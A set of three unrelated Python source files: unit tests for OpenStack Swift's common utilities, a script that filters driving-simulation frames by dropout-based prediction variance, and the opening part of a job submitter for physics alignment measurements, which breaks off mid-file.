self.assertEqual(tb_func[0], "test_preserving_stack_trace_from_thread")
def test_terminate(self):
initial_thread_count = threading.activeCount()
initial_pipe_count = self._pipe_count()
tp = utils.ThreadPool(4)
# do some work to ensure any lazy initialization happens
tp.run_in_thread(os.path.join, 'foo', 'bar')
tp.run_in_thread(os.path.join, 'baz', 'quux')
# 4 threads in the ThreadPool, plus one pipe for IPC; this also
# serves as a sanity check that we're actually allocating some
# resources to free later
self.assertEqual(initial_thread_count, threading.activeCount() - 4)
self.assertEqual(initial_pipe_count, self._pipe_count() - 2)
tp.terminate()
self.assertEqual(initial_thread_count, threading.activeCount())
self.assertEqual(initial_pipe_count, self._pipe_count())
def test_cant_run_after_terminate(self):
tp = utils.ThreadPool(0)
tp.terminate()
self.assertRaises(ThreadPoolDead, tp.run_in_thread, lambda: 1)
self.assertRaises(ThreadPoolDead, tp.force_run_in_thread, lambda: 1)
def test_double_terminate_doesnt_crash(self):
tp = utils.ThreadPool(0)
tp.terminate()
tp.terminate()
tp = utils.ThreadPool(1)
tp.terminate()
tp.terminate()
def test_terminate_no_threads_doesnt_crash(self):
tp = utils.ThreadPool(0)
tp.terminate()
class TestAuditLocationGenerator(unittest.TestCase):
def test_drive_tree_access(self):
orig_listdir = utils.listdir
def _mock_utils_listdir(path):
if 'bad_part' in path:
raise OSError(errno.EACCES)
elif 'bad_suffix' in path:
raise OSError(errno.EACCES)
elif 'bad_hash' in path:
raise OSError(errno.EACCES)
else:
return orig_listdir(path)
# Check Raise on Bad partition
tmpdir = mkdtemp()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
obj_path = os.path.join(data, "bad_part")
with open(obj_path, "w"):
pass
part1 = os.path.join(data, "partition1")
os.makedirs(part1)
part2 = os.path.join(data, "partition2")
os.makedirs(part2)
with patch('swift.common.utils.listdir', _mock_utils_listdir):
audit = lambda: list(utils.audit_location_generator(
tmpdir, "data", mount_check=False))
self.assertRaises(OSError, audit)
rmtree(tmpdir)
# Check Raise on Bad Suffix
tmpdir = mkdtemp()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
part1 = os.path.join(data, "partition1")
os.makedirs(part1)
part2 = os.path.join(data, "partition2")
os.makedirs(part2)
obj_path = os.path.join(part1, "bad_suffix")
with open(obj_path, 'w'):
pass
suffix = os.path.join(part2, "suffix")
os.makedirs(suffix)
with patch('swift.common.utils.listdir', _mock_utils_listdir):
audit = lambda: list(utils.audit_location_generator(
tmpdir, "data", mount_check=False))
self.assertRaises(OSError, audit)
rmtree(tmpdir)
# Check Raise on Bad Hash
tmpdir = mkdtemp()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
part1 = os.path.join(data, "partition1")
os.makedirs(part1)
suffix = os.path.join(part1, "suffix")
os.makedirs(suffix)
hash1 = os.path.join(suffix, "hash1")
os.makedirs(hash1)
obj_path = os.path.join(suffix, "bad_hash")
with open(obj_path, 'w'):
pass
with patch('swift.common.utils.listdir', _mock_utils_listdir):
audit = lambda: list(utils.audit_location_generator(
tmpdir, "data", mount_check=False))
self.assertRaises(OSError, audit)
rmtree(tmpdir)
def test_non_dir_drive(self):
with temptree([]) as tmpdir:
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
            # Create a file that represents a non-dir drive
open(os.path.join(tmpdir, 'asdf'), 'w')
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False, logger=logger
)
self.assertEqual(list(locations), [])
self.assertEqual(1, len(logger.get_lines_for_level('warning')))
# Test without the logger
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False
)
self.assertEqual(list(locations), [])
def test_mount_check_drive(self):
with temptree([]) as tmpdir:
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
            # Create a file that represents a non-dir drive
open(os.path.join(tmpdir, 'asdf'), 'w')
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=True, logger=logger
)
self.assertEqual(list(locations), [])
self.assertEqual(2, len(logger.get_lines_for_level('warning')))
# Test without the logger
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=True
)
self.assertEqual(list(locations), [])
def test_non_dir_contents(self):
with temptree([]) as tmpdir:
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
with open(os.path.join(data, "partition1"), "w"):
pass
partition = os.path.join(data, "partition2")
os.makedirs(partition)
with open(os.path.join(partition, "suffix1"), "w"):
pass
suffix = os.path.join(partition, "suffix2")
os.makedirs(suffix)
with open(os.path.join(suffix, "hash1"), "w"):
pass
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False, logger=logger
)
self.assertEqual(list(locations), [])
def test_find_objects(self):
with temptree([]) as tmpdir:
expected_objs = list()
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
            # Create a file that represents a non-dir drive
open(os.path.join(tmpdir, 'asdf'), 'w')
partition = os.path.join(data, "partition1")
os.makedirs(partition)
suffix = os.path.join(partition, "suffix")
os.makedirs(suffix)
hash_path = os.path.join(suffix, "hash")
os.makedirs(hash_path)
obj_path = os.path.join(hash_path, "obj1.db")
with open(obj_path, "w"):
pass
expected_objs.append((obj_path, 'drive', 'partition1'))
partition = os.path.join(data, "partition2")
os.makedirs(partition)
suffix = os.path.join(partition, "suffix2")
os.makedirs(suffix)
hash_path = os.path.join(suffix, "hash2")
os.makedirs(hash_path)
obj_path = os.path.join(hash_path, "obj2.db")
with open(obj_path, "w"):
pass
expected_objs.append((obj_path, 'drive', 'partition2'))
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False, logger=logger
)
got_objs = list(locations)
self.assertEqual(len(got_objs), len(expected_objs))
self.assertEqual(sorted(got_objs), sorted(expected_objs))
self.assertEqual(1, len(logger.get_lines_for_level('warning')))
def test_ignore_metadata(self):
with temptree([]) as tmpdir:
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
partition = os.path.join(data, "partition2")
os.makedirs(partition)
suffix = os.path.join(partition, "suffix2")
os.makedirs(suffix)
hash_path = os.path.join(suffix, "hash2")
os.makedirs(hash_path)
obj_path = os.path.join(hash_path, "obj1.dat")
with open(obj_path, "w"):
pass
meta_path = os.path.join(hash_path, "obj1.meta")
with open(meta_path, "w"):
pass
locations = utils.audit_location_generator(
tmpdir, "data", ".dat", mount_check=False, logger=logger
)
self.assertEqual(list(locations),
[(obj_path, "drive", "partition2")])
class TestGreenAsyncPile(unittest.TestCase):
def test_runs_everything(self):
def run_test():
tests_ran[0] += 1
return tests_ran[0]
tests_ran = [0]
pile = utils.GreenAsyncPile(3)
for x in range(3):
pile.spawn(run_test)
self.assertEqual(sorted(x for x in pile), [1, 2, 3])
def test_is_asynchronous(self):
def run_test(index):
events[index].wait()
return index
pile = utils.GreenAsyncPile(3)
for order in ((1, 2, 0), (0, 1, 2), (2, 1, 0), (0, 2, 1)):
events = [eventlet.event.Event(), eventlet.event.Event(),
eventlet.event.Event()]
for x in range(3):
pile.spawn(run_test, x)
for x in order:
events[x].send()
self.assertEqual(next(pile), x)
def test_next_when_empty(self):
def run_test():
pass
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test)
self.assertEqual(next(pile), None)
self.assertRaises(StopIteration, lambda: next(pile))
def test_waitall_timeout_timesout(self):
def run_test(sleep_duration):
eventlet.sleep(sleep_duration)
completed[0] += 1
return sleep_duration
completed = [0]
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test, 0.1)
pile.spawn(run_test, 1.0)
self.assertEqual(pile.waitall(0.5), [0.1])
self.assertEqual(completed[0], 1)
def test_waitall_timeout_completes(self):
def run_test(sleep_duration):
eventlet.sleep(sleep_duration)
completed[0] += 1
return sleep_duration
completed = [0]
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test, 0.1)
pile.spawn(run_test, 0.1)
self.assertEqual(pile.waitall(0.5), [0.1, 0.1])
self.assertEqual(completed[0], 2)
def test_waitfirst_only_returns_first(self):
def run_test(name):
eventlet.sleep(0)
completed.append(name)
return name
completed = []
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test, 'first')
pile.spawn(run_test, 'second')
pile.spawn(run_test, 'third')
self.assertEqual(pile.waitfirst(0.5), completed[0])
# 3 still completed, but only the first was returned.
self.assertEqual(3, len(completed))
def test_wait_with_firstn(self):
def run_test(name):
eventlet.sleep(0)
completed.append(name)
return name
for first_n in [None] + list(range(6)):
completed = []
pile = utils.GreenAsyncPile(10)
for i in range(10):
pile.spawn(run_test, i)
actual = pile._wait(1, first_n)
expected_n = first_n if first_n else 10
self.assertEqual(completed[:expected_n], actual)
self.assertEqual(10, len(completed))
def test_pending(self):
pile = utils.GreenAsyncPile(3)
self.assertEqual(0, pile._pending)
for repeats in range(2):
            # repeat to verify that pending goes back up after going down
for i in range(4):
pile.spawn(lambda: i)
self.assertEqual(4, pile._pending)
for i in range(3, -1, -1):
next(pile)
self.assertEqual(i, pile._pending)
# sanity check - the pile is empty
self.assertRaises(StopIteration, pile.next)
# pending remains 0
self.assertEqual(0, pile._pending)
class TestLRUCache(unittest.TestCase):
def test_maxsize(self):
@utils.LRUCache(maxsize=10)
def f(*args):
return math.sqrt(*args)
_orig_math_sqrt = math.sqrt
# setup cache [0-10)
for i in range(10):
self.assertEqual(math.sqrt(i), f(i))
self.assertEqual(f.size(), 10)
# validate cache [0-10)
with patch('math.sqrt'):
for i in range(10):
self.assertEqual(_orig_math_sqrt(i), f(i))
self.assertEqual(f.size(), 10)
# update cache [10-20)
for i in range(10, 20):
self.assertEqual(math.sqrt(i), f(i))
# cache size is fixed
self.assertEqual(f.size(), 10)
# validate cache [10-20)
with patch('math.sqrt'):
for i in range(10, 20):
self.assertEqual(_orig_math_sqrt(i), f(i))
# validate un-cached [0-10)
with patch('math.sqrt', new=None):
for i in range(10):
self.assertRaises(TypeError, f, i)
# cache unchanged
self.assertEqual(f.size(), 10)
with patch('math.sqrt'):
for i in range(10, 20):
self.assertEqual(_orig_math_sqrt(i), f(i))
self.assertEqual(f.size(), 10)
def test_maxtime(self):
@utils.LRUCache(maxtime=30)
def f(*args):
return math.sqrt(*args)
self.assertEqual(30, f.maxtime)
_orig_math_sqrt = math.sqrt
now = time.time()
the_future = now + 31
# setup cache [0-10)
with patch('time.time', lambda: now):
for i in range(10):
self.assertEqual(math.sqrt(i), f(i))
self.assertEqual(f.size(), 10)
# validate cache [0-10)
with patch('math.sqrt'):
for i in range(10):
self.assertEqual(_orig_math_sqrt(i), f(i))
self.assertEqual(f.size(), 10)
# validate expired [0-10)
with patch('math.sqrt', new=None):
with patch('time.time', lambda: the_future):
for i in range(10):
self.assertRaises(TypeError, f, i)
# validate repopulates [0-10)
with patch('time.time', lambda: the_future):
for i in range(10):
self.assertEqual(math.sqrt(i), f(i))
# reuses cache space
self.assertEqual(f.size(), 10)
def test_set_maxtime(self):
@utils.LRUCache(maxtime=30)
def f(*args):
return math.sqrt(*args)
self.assertEqual(30, f.maxtime)
self.assertEqual(2, f(4))
self.assertEqual(1, f.size())
# expire everything
f.maxtime = -1
# validate un-cached [0-10)
with patch('math.sqrt', new=None):
self.assertRaises(TypeError, f, 4)
def test_set_maxsize(self):
@utils.LRUCache(maxsize=10)
def f(*args):
return math.sqrt(*args)
for i in range(12):
f(i)
self.assertEqual(f.size(), 10)
f.maxsize = 4
for i in range(12):
f(i)
self.assertEqual(f.size(), 4)
class TestParseContentRange(unittest.TestCase):
def test_good(self):
start, end, total = utils.parse_content_range("bytes 100-200/300")
self.assertEqual(start, 100)
self.assertEqual(end, 200)
self.assertEqual(total, 300)
def test_bad(self):
self.assertRaises(ValueError, utils.parse_content_range,
"100-300/500")
self.assertRaises(ValueError, utils.parse_content_range,
"bytes 100-200/aardvark")
self.assertRaises(ValueError, utils.parse_content_range,
"bytes bulbous-bouffant/4994801")
class TestParseContentDisposition(unittest.TestCase):
def test_basic_content_type(self):
name, attrs = utils.parse_content_disposition('text/plain')
self.assertEqual(name, 'text/plain')
self.assertEqual(attrs, {})
def test_content_type_with_charset(self):
name, attrs = utils.parse_content_disposition(
'text/plain; charset=UTF8')
self.assertEqual(name, 'text/plain')
self.assertEqual(attrs, {'charset': 'UTF8'})
def test_content_disposition(self):
name, attrs = utils.parse_content_disposition(
'form-data; name="somefile"; filename="test.html"')
self.assertEqual(name, 'form-data')
self.assertEqual(attrs, {'name': 'somefile', 'filename': 'test.html'})
def test_content_disposition_without_white_space(self):
name, attrs = utils.parse_content_disposition(
'form-data;name="somefile";filename="test.html"')
self.assertEqual(name, 'form-data')
self.assertEqual(attrs, {'name': 'somefile', 'filename': 'test.html'})
class TestIterMultipartMimeDocuments(unittest.TestCase):
def test_bad_start(self):
it = utils.iter_multipart_mime_documents(StringIO('blah'), 'unique')
exc = None
try:
next(it)
except MimeInvalid as err:
exc = err
self.assertTrue('invalid starting boundary' in str(exc))
self.assertTrue('--unique' in str(exc))
def test_empty(self):
it = utils.iter_multipart_mime_documents(StringIO('--unique'),
'unique')
fp = next(it)
self.assertEqual(fp.read(), '')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_basic(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabcdefg\r\n--unique--'), 'unique')
fp = next(it)
self.assertEqual(fp.read(), 'abcdefg')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_basic2(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabcdefg\r\n--unique\r\nhijkl\r\n--unique--'),
'unique')
fp = next(it)
self.assertEqual(fp.read(), 'abcdefg')
fp = next(it)
self.assertEqual(fp.read(), 'hijkl')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_tiny_reads(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabcdefg\r\n--unique\r\nhijkl\r\n--unique--'),
'unique')
fp = next(it)
self.assertEqual(fp.read(2), 'ab')
self.assertEqual(fp.read(2), 'cd')
self.assertEqual(fp.read(2), 'ef')
self.assertEqual(fp.read(2), 'g')
self.assertEqual(fp.read(2), '')
fp = next(it)
self.assertEqual(fp.read(), 'hijkl')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_big_reads(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabcdefg\r\n--unique\r\nhijkl\r\n--unique--'),
'unique')
fp = next(it)
self.assertEqual(fp.read(65536), 'abcdefg')
self.assertEqual(fp.read(), '')
fp = next(it)
self.assertEqual(fp.read(), 'hijkl')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_leading_crlfs(self):
it = utils.iter_multipart_mime_documents(
StringIO('\r\n\r\n\r\n--unique\r\nabcdefg\r\n'
'--unique\r\nhijkl\r\n--unique--'),
'unique')
fp = next(it)
self.assertEqual(fp.read(65536), 'abcdefg')
self.assertEqual(fp.read(), '')
fp = next(it)
self.assertEqual(fp.read(), 'hijkl')
        self.assertRaises(StopIteration, lambda: next(it))
def test_broken_mid_stream(self):
# We go ahead and accept whatever is sent instead of rejecting the
# whole request, in case the partial form is still useful.
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabc'), 'unique')
fp = next(it)
self.assertEqual(fp.read(), 'abc')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_readline(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nab\r\ncd\ref\ng\r\n--unique\r\nhi\r\n\r\n'
'jkl\r\n\r\n--unique--'), 'unique')
fp = next(it)
self.assertEqual(fp.readline(), 'ab\r\n')
self.assertEqual(fp.readline(), 'cd\ref\ng')
self.assertEqual(fp.readline(), '')
fp = next(it)
self.assertEqual(fp.readline(), 'hi\r\n')
self.assertEqual(fp.readline(), '\r\n')
self.assertEqual(fp.readline(), 'jkl\r\n')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_readline_with_tiny_chunks(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nab\r\ncd\ref\ng\r\n--unique\r\nhi\r\n'
'\r\njkl\r\n\r\n--unique--'),
'unique',
read_chunk_size=2)
fp = next(it)
self.assertEqual(fp.readline(), 'ab\r\n')
self.assertEqual(fp.readline(), 'cd\ref\ng')
self.assertEqual(fp.readline(), '')
fp = next(it)
self.assertEqual(fp.readline(), 'hi\r\n')
self.assertEqual(fp.readline(), '\r\n')
self.assertEqual(fp.readline(), 'jkl\r\n')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
class TestParseMimeHeaders(unittest.TestCase):
def test_parse_mime_headers(self):
doc_file = BytesIO(b"""Content-Disposition: form-data; name="file_size"
Foo: Bar
NOT-title-cAsED: quux
Connexion: =?iso8859-1?q?r=E9initialis=E9e_par_l=27homologue?=
Status: =?utf-8?b?5byA5aeL6YCa6L+H5a+56LGh5aSN5Yi2?=
Latin-1: Resincronizaci\xf3n realizada con \xe9xito
Utf-8: \xd0\xba\xd0\xbe\xd0\xbd\xd1\x82\xd0\xb5\xd0\xb9\xd0\xbd\xd0\xb5\xd1\x80
This is the body
""")
headers = utils.parse_mime_headers(doc_file)
utf8 = u'\u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440'
if six.PY2:
utf8 = utf8.encode('utf-8')
expected_headers = {
'Content-Disposition': 'form-data; name="file_size"',
'Foo': "Bar",
'Not-Title-Cased': "quux",
# Encoded-word or non-ASCII values are treated just like any other
# bytestring (at least for now)
'Connexion': "=?iso8859-1?q?r=E9initialis=E9e_par_l=27homologue?=",
'Status': "=?utf-8?b?5byA5aeL6YCa6L+H5a+56LGh5aSN5Yi2?=",
'Latin-1': "Resincronizaci\xf3n realizada con \xe9xito",
'Utf-8': utf8,
}
self.assertEqual(expected_headers, headers)
self.assertEqual(b"This is the body\n", doc_file.read())
class FakeResponse(object):
def __init__(self, status, headers, body):
self.status = status
self.headers = HeaderKeyDict(headers)
self.body = StringIO(body)
def getheader(self, header_name):
return str(self.headers.get(header_name, ''))
def getheaders(self):
return self.headers.items()
def read(self, length=None):
return self.body.read(length)
def readline(self, length=None):
return self.body.readline(length)
class TestDocumentItersToHTTPResponseBody(unittest.TestCase):
def test_no_parts(self):
body = utils.document_iters_to_http_response_body(
iter([]), 'dontcare',
multipart=False, logger=FakeLogger())
self.assertEqual(body, '')
def test_single_part(self):
body = "time flies like an arrow; fruit flies like a banana"
doc_iters = [{'part_iter': iter(StringIO(body).read, '')}]
resp_body = ''.join(
utils.document_iters_to_http_response_body(
iter(doc_iters), 'dontcare',
multipart=False, logger=FakeLogger()))
self.assertEqual(resp_body, body)
def test_multiple_parts(self):
part1 = "two peanuts were walking down a railroad track"
part2 = "and one was a salted. ... peanut."
doc_iters = [{
'start_byte': 88,
'end_byte': 133,
'content_type': 'application/peanut',
'entity_length': 1024,
'part_iter': iter(StringIO(part1).read, ''),
}, {
'start_byte': 500,
'end_byte': 532,
'content_type': 'application/salted',
'entity_length': 1024,
'part_iter': iter(StringIO(part2).read, ''),
}]
resp_body = ''.join(
utils.document_iters_to_http_response_body(
iter(doc_iters), 'boundaryboundary',
multipart=True, logger=FakeLogger()))
self.assertEqual(resp_body, (
"--boundaryboundary\r\n" +
# This is a little too strict; we don't actually care that the
# headers are in this order, but the test is much more legible
# this way.
"Content-Type: application/peanut\r\n" +
"Content-Range: bytes 88-133/1024\r\n" +
"\r\n" +
part1 + "\r\n" +
"--boundaryboundary\r\n"
"Content-Type: application/salted\r\n" +
"Content-Range: bytes 500-532/1024\r\n" +
"\r\n" +
part2 + "\r\n" +
"--boundaryboundary--"))
class TestPairs(unittest.TestCase):
def test_pairs(self):
items = [10, 20, 30, 40, 50, 60]
got_pairs = set(utils.pairs(items))
self.assertEqual(got_pairs,
set([(10, 20), (10, 30), (10, 40), (10, 50), (10, 60),
(20, 30), (20, 40), (20, 50), (20, 60),
(30, 40), (30, 50), (30, 60),
(40, 50), (40, 60),
(50, 60)]))
class TestSocketStringParser(unittest.TestCase):
def test_socket_string_parser(self):
default = 1337
addrs = [('1.2.3.4', '1.2.3.4', default),
('1.2.3.4:5000', '1.2.3.4', 5000),
('[dead:beef::1]', 'dead:beef::1', default),
('[dead:beef::1]:5000', 'dead:beef::1', 5000),
('example.com', 'example.com', default),
('example.com:5000', 'example.com', 5000),
('foo.1-2-3.bar.com:5000', 'foo.1-2-3.bar.com', 5000),
('1.2.3.4:10:20', None, None),
('dead:beef::1:5000', None, None)]
for addr, expected_host, expected_port in addrs:
if expected_host:
host, port = utils.parse_socket_string(addr, default)
self.assertEqual(expected_host, host)
self.assertEqual(expected_port, int(port))
else:
with self.assertRaises(ValueError):
utils.parse_socket_string(addr, default)
if __name__ == '__main__':
unittest.main()
|
filter_dagger_data_var.py
|
"""
Script for policy-based sampling using an uncertainty estimate.
Uncertainty is measured as the variance of the predicted controls over
100 forward passes of the model with test-time dropout.
Requires:
var_file: computed variance in the controls with test time dropout
preload: npy preload file for the entire on-policy data
"""
import os
import sys
import time
import json
import shutil
import argparse
import multiprocessing
import numpy as np
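# --- Illustrative sketch (not part of this script's pipeline) ---
# The docstring above assumes a precomputed var_file: the per-sample variance of the
# predicted controls over repeated stochastic forward passes (test-time dropout).
# A minimal numpy-only sketch of that computation is shown below; `predict_controls`
# is a hypothetical stand-in for the dropout-enabled policy network.
def compute_control_variance(predict_controls, samples, n_passes=100):
    """Return an (len(samples), 3) array: variance of [steer, throttle, brake]
    over n_passes stochastic predictions per sample."""
    variances = []
    for sample in samples:
        preds = np.stack([predict_controls(sample) for _ in range(n_passes)])
        variances.append(preds.var(axis=0))
    return np.asarray(variances)
# Example usage with a dummy stochastic predictor standing in for MC dropout:
# dummy = lambda s: np.random.normal(loc=[0.0, 0.5, 0.0], scale=0.05, size=3)
# np.save('controls_var.npy', compute_control_variance(dummy, range(10)))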
def filter_episode(episode, episode_data):
if not os.path.isdir(os.path.join(args.target_dir, episode)):
os.mkdir(os.path.join(args.target_dir, episode))
files = sorted(os.listdir(os.path.join(args.source_dir, episode)))
if 'metadata.json' in files:
shutil.copy2(os.path.join(args.source_dir, episode, 'metadata.json'), os.path.join(args.target_dir, episode, 'metadata.json'))
if 'processed2' in files:
shutil.copy2(os.path.join(args.source_dir, episode, 'processed2'), os.path.join(args.target_dir, episode, 'processed2'))
for filename in episode_data:
episode_number = filename.split('_')[-1].split('.')[0]
central_image = os.path.join(args.source_dir, episode, 'CentralRGB_%s.png'%episode_number)
left_image = os.path.join(args.source_dir, episode, 'LeftRGB_%s.png'%episode_number)
right_image = os.path.join(args.source_dir, episode, 'RightRGB_%s.png'%episode_number)
shutil.copy2(central_image, os.path.join(args.target_dir, episode, 'CentralRGB_%s.png'%episode_number))
shutil.copy2(left_image, os.path.join(args.target_dir, episode, 'LeftRGB_%s.png'%episode_number))
shutil.copy2(right_image, os.path.join(args.target_dir, episode, 'RightRGB_%s.png'%episode_number))
measurements_file = os.path.join(args.source_dir, episode, 'measurements_%s.json'%episode_number)
shutil.copy2(measurements_file, os.path.join(args.target_dir, episode, 'measurements_%s.json'%episode_number))
# this function is used to get the sampled episodes in the first iteration
def get_required_episodes():
computed_var = np.load(args.var_file)
preload = np.load(args.preload)
    # take the max variance over steer, throttle and brake
max_var = np.max(computed_var, axis=1)
print (max_var.shape)
indices_var = np.argsort(max_var)
required_var = max_var[indices_var[::-1]]
threshold_index = 72507 # this is selected based on the proportion of data to be sampled in the first iteration
threshold_var = required_var[threshold_index]
print (threshold_var)
new_preload = preload[0][indices_var[::-1]]
required_preload = new_preload[:threshold_index]
required_episodes = {}
for i in range(len(required_preload)):
curr_episode, curr_frame = required_preload[i].split('/')
if curr_episode in required_episodes:
required_episodes[curr_episode].append(curr_frame)
else:
required_episodes[curr_episode] = [curr_frame]
print (len(required_episodes))
return required_episodes
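# Illustrative only -- the exact preload entry format is assumed from the split('/')
# above: an entry such as 'episode_00123/CentralRGB_00042.png' would be grouped as
#   required_episodes['episode_00123'] == ['CentralRGB_00042.png', ...]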
# once the threshold is fixed after the first iteration, use this function for sampling
def get_required_episodes_thres():
computed_var = np.load(args.var_file)
preload = np.load(args.preload)
max_var = np.max(computed_var, axis=1)
thres = 0.00963
required_preload = preload[0][max_var>thres]
'''
#indices_var = np.argsort(max_var)
#required_var = max_var[indices_var[::-1]]
#threshold_index = 72507
#threshold_var = required_var[threshold_index]
#print (threshold_var)
#new_preload = preload[0][indices_var[::-1]]
#required_preload = new_preload[:threshold_index]
#print (required_preload)
'''
required_episodes = {}
for i in range(len(required_preload)):
curr_episode, curr_frame = required_preload[i].split('/')
if curr_episode in required_episodes:
required_episodes[curr_episode].append(curr_frame)
else:
required_episodes[curr_episode] = [curr_frame]
print (len(required_episodes))
return required_episodes
def main():
manager = multiprocessing.Manager()
return_dict = manager.dict()
jobs = []
if not os.path.isdir(args.target_dir):
os.mkdir(args.target_dir)
# episodes_dict = get_required_episodes() # this is used for the first iteration
    episodes_dict = get_required_episodes_thres() # this is used for the subsequent iterations
# if 'metadata.json' in episodes_list:
# shutil.copy2(os.path.join(source_dir, 'metadata.json'), os.path.join(target_dir, 'metadata.json'))
st = time.time()
for episode in episodes_dict:
print ('episode: ', episode)
p = multiprocessing.Process(target=filter_episode, args=(episode, episodes_dict[episode]))
jobs.append(p)
p.start()
for process in jobs:
process.join()
print ('time for processing episodes: ', time.time()-st)
for episode in episodes_dict:
print (episode, len(episodes_dict[episode]))
if __name__ == '__main__':
global args
parser = argparse.ArgumentParser()
parser.add_argument('--source_dir', type=str, required=True, help='source directory')
parser.add_argument('--target_dir', type=str, required=True, help='target directory')
parser.add_argument('--preload', type=str, required=True, help='preload path of required dataset')
parser.add_argument('--var_file', type=str, required=True, help='path of variance file')
args = parser.parse_args()
main()
|
autoSubmitter.py
|
from __future__ import print_function
import configparser as ConfigParser
import argparse
import shelve
import sys
import os
import subprocess
import threading
import shutil
import time
import re
from helpers import *
shelve_name = "dump.shelve" # contains all the measurement objects
history_file = "history.log"
clock_interval = 20 # in seconds
delete_logs_after_finish = False # set to True if the log and submit script files should not be kept
use_caf = False
def save(name, object):
    # with multiple threads running, this prevents potentially problematic concurrent file access
global lock
lock.acquire()
try:
sh = shelve.open(shelve_name)
sh[name] = object
sh.close()
finally:
lock.release()
class Dataset:
name = ""
nFiles = 0
maxEvents = -1
baseDirectory = ""
sampleType = "data1"
fileList = []
conditions = []
def __init__(self, config, name):
dsDict = dict(config.items("dataset:{}".format(name)))
self.name = name
self.baseDirectory = dsDict["baseDirectory"]
self.fileList = []
names = dsDict["fileNames"].split(" ")
for name in names:
parsedNames = replaceAllRanges(name)
for fileName in parsedNames:
self.fileList.append(self.baseDirectory+"/"+fileName)
self.nFiles = len(self.fileList)
if "maxEvents" in dsDict:
self.maxEvents = int(dsDict["maxEvents"])
if "isMC" in dsDict:
if dsDict["isMC"] == "True":
self.sampleType = "MC"
else:
self.sampleType ="data1"
if "isCosmics" in dsDict:
self.isCosmics = (dsDict["isCosmics"] == "True")
else:
self.isCosmics = False
self.conditions, dummy, self.validConditions = loadConditions(dsDict)
# check if any of the sources used for conditions is invalid
if not self.validConditions:
print("Invalid conditions defined for dataset {}".format(self.name))
# check if all files specified exist
self.existingFiles, missingFiles = allFilesExist(self)
if not self.existingFiles:
for fileName in missingFiles:
print("Invalid file name {} defined for dataset {}".format(fileName, self.name))
class Alignment:
name = ""
alignmentName = None
baselineDir = "Design"
globalTag = "None"
isDesign = False
hasAlignmentCondition = False
conditions = []
def __init__(self, config, name):
alDict = dict(config.items("alignment:{}".format(name)))
self.name = name
if "alignmentName" in alDict:
self.alignmentName = alDict["alignmentName"]
if "globalTag" in alDict:
self.globalTag = alDict["globalTag"]
if "baselineDir" in alDict:
self.baselineDir= alDict["baselineDir"]
if "isDesign" in alDict:
self.isDesign= (alDict["isDesign"] == "True")
# If self.hasAlignmentCondition is true, no other Alignment-Object is loaded in apeEstimator_cfg.py using the alignmentName
self.conditions, self.hasAlignmentCondition, self.validConditions = loadConditions(alDict)
# check if any of the sources used for conditions is invalid
if not self.validConditions:
print("Invalid conditions defined for alignment {}".format(self.name))
# check if at least one of the two ways to define the alignment was used
if self.alignmentName == None and not self.hasAlignmentCondition:
print("Error: No alignment object name or record was defined for alignment {}".format(self.name))
sys.exit()
class ApeMeasurement:
name = "workingArea"
curIteration = 0
firstIteration = 0
maxIterations = 15
maxEvents = None
status = STATE_NONE
dataset = None
alignment = None
runningJobs = None
failedJobs = None
startTime = ""
finishTime = ""
def __init__(self, name, config, settings):
self.name = name
self.status = STATE_ITERATION_START
self.runningJobs = []
self.failedJobs = []
self.startTime = subprocess.check_output(["date"]).strip()
# load conditions from dictionary, overwrite defaults if defined
for key, value in settings.items():
if not key.startswith("condition "):
setattr(self, key, value)
# Replace names with actual Dataset and Alignment objects
# In principle, one could preload all these once so they are not
# redefined for each measurement, but right now this does not
# seem necessary
self.dataset = Dataset(config, settings["dataset"])
self.alignment = Alignment(config, settings["alignment"])
# If not defined here, replace by setting from Dataset
if not "maxEvents" in settings:
self.maxEvents = self.dataset.maxEvents
self.firstIteration=int(self.firstIteration)
self.maxIterations=int(self.maxIterations)
self.curIteration = self.firstIteration
self.maxEvents = int(self.maxEvents)
if self.alignment.isDesign:
self.maxIterations = 0
self.conditions, dummy, self.validConditions = loadConditions(settings)
# see if sanity checks passed
if not self.alignment.validConditions or not self.dataset.validConditions or not self.dataset.existingFiles or not self.validConditions:
self.status = STATE_INVALID_CONDITIONS
self.print_status()
self.finishTime = subprocess.check_output(["date"]).strip()
return
if self.alignment.isDesign and self.dataset.sampleType != "MC":
# For now, this won't immediately shut down the program
